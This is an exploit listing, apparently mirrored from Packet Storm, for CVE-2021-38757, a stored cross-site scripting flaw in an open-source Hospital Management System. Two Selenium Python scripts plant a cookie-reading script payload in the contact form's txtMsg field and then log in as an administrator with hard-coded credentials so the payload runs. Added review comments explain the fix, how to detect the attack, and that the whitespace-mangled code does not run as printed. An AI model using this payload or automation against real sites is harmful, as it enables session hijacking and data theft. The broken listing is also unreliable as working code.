## https://sploitus.com/exploit?id=PACKETSTORM:163869
# Exploit Title: XSS-Stored PHPSESSID user PWNED on Hospital Management System Vulnerable parameter "txtMsg" on contact  
# Author: nu11secur1ty  
# Testing and Debugging: nu11secur1ty  
# Date: 08.17.2021  
# Vendor: https://github.com/kishan0725/Hospital-Management-System  
# Link: https://github.com/kishan0725/Hospital-Management-System  
# CVE: CVE-2021-38757  
  
[+] Exploit Source:  
  
### P0C  
  
#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757
#
# PoC driver for the stored XSS in the contact form (CVE-2021-38757).
# As listed it: launches Chrome through Selenium WebDriver, opens
# contact.html, sets the four form fields by writing their DOM values from
# JavaScript, clicks the submit button, then shells out to the separate
# "Ch3ck" script (listed further down on this page).
#
# NOTE(review): this listing is whitespace-mangled -- the try/except body is
# not indented and the website_link literal is wrapped across two lines --
# so it does not run as printed.
#
# Defender's reading: only txtMsg carries a payload; the other three fields
# are given placeholder values. A stored XSS of this shape means txtMsg is
# persisted and later rendered without HTML output encoding -- presumably in
# admin-panel1.php, which is the page the check script opens (confirm against
# the vendor source). The fix is output encoding at the render site
# (htmlspecialchars() or the template engine's escaping); an HttpOnly flag on
# the session cookie keeps document.cookie from exposing PHPSESSID, and a
# Content-Security-Policy without 'unsafe-inline' blocks the inline <script>
# -- both are defence in depth, not a substitute. Detection: contact-form
# submissions whose txtMsg contains HTML tags are trivial to flag in WAF or
# application logs.

from selenium import webdriver
import time   # imported but never used in this script
import os

#enter the link to the website you want to automate login.
# The host is the author's lab instance. NOTE(review): in this listing the
# string literal is wrapped across two lines.
website_link="
http://192.168.1.3/Hospital-Management-System-master/contact.html"


browser = webdriver.Chrome()   # starts a Chrome session under WebDriver control
browser.get((website_link))    # the doubled parentheses are redundant

try:
## The Exploit
# Each execute_script() call writes a field's value directly into the DOM
# rather than typing into it, so client-side input handlers are bypassed.
browser.execute_script("document.querySelector('[name=\"txtName\"]').value=\"User\"")
# NOTE(review): this literal is also wrapped across two lines in the listing.
# The e-mail used here differs from the login e-mail in the check script.
browser.execute_script("document.querySelector('[name=\"txtEmail\"]').value=\"
taratora@abv.bg\"")
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")
# Exact duplicate of the previous line (txtPhone is set twice); redundant.
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")
# txtMsg is the vulnerable parameter named in the advisory title: the value
# stored here is an inline <script> that reads document.cookie.
browser.execute_script("document.querySelector('[name=\"txtMsg\"]').value=\"nu11secur1ty<script>alert(document.cookie)</script>\"")

## submit the exploit
browser.execute_script("document.querySelector('[name=\"btnSubmit\"]').click()")

# Check
# Runs the companion script through a shell (os.system). The path is
# relative, so this only works when the current directory holds
# PoC-CVE-2021-38757-Check.py; its exit status is ignored.
os.system("python PoC-CVE-2021-38757-Check.py")

# Printed whenever no exception was raised; nothing above verifies that the
# submission was accepted or that the message was stored.
print("The payload for CVE CVE-2021-38757 is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
# NOTE(review): catching Exception also folds WebDriver start-up failures and
# navigation errors into the same generic message, so a failure here says
# nothing about its cause. The message text is runtime output and is left as is.
print("Some error occured :(")
  
### Ch3ck  
  
#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757
#
# Companion "Ch3ck" script, launched by the PoC above via os.system(). It
# logs in through index1.php with the hard-coded account below, waits three
# seconds, then opens admin-panel1.php -- presumably the page that renders
# the stored contact message (confirm against the vendor source). The only
# evidence it offers is visual: the alert firing in the opened browser.
#
# NOTE(review): same listing problems as the PoC: the try body is not
# indented and both URL literals are wrapped across two lines, so this does
# not run as printed.

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
# Author's lab host. NOTE(review): wrapped literal in the listing.
website_link="
http://192.168.1.3/Hospital-Management-System-master/index1.php"

#enter your login username
# Hard-coded account on the author's test instance.
username="tarator@abv.bg"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="email"
#enter the element for password input field
element_for_password="password2"
#enter the element for submit button
element_for_submit="patsub"

browser = webdriver.Chrome()
browser.get((website_link))

try:
# find_element_by_name() was deprecated in Selenium 4 and removed in later
# 4.x releases; this listing targets the Selenium 3 API.
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Check
time.sleep(3)   # fixed wait for the post-login redirect; no explicit wait condition
browser.maximize_window()
# NOTE(review): wrapped literal in the listing. Opening this page in the
# logged-in session is the whole "check" -- the script does not read the
# response or look for the injected element.
browser.get(("
http://192.168.1.3/Hospital-Management-System-master/admin-panel1.php#"))

# Printed on any exception-free run: nothing confirms the login succeeded
# or that the payload rendered.
print("The payload for CVE CVE-2021-38757 is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
# NOTE(review): as in the PoC, the broad except hides WebDriver and
# navigation failures behind one generic message.
print("Some error occured :(")
  
  
----------------------------------------------------------------------------------------  
  
# Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757  
# Proof: https://streamable.com/6xue3b  
# BR nu11secur1ty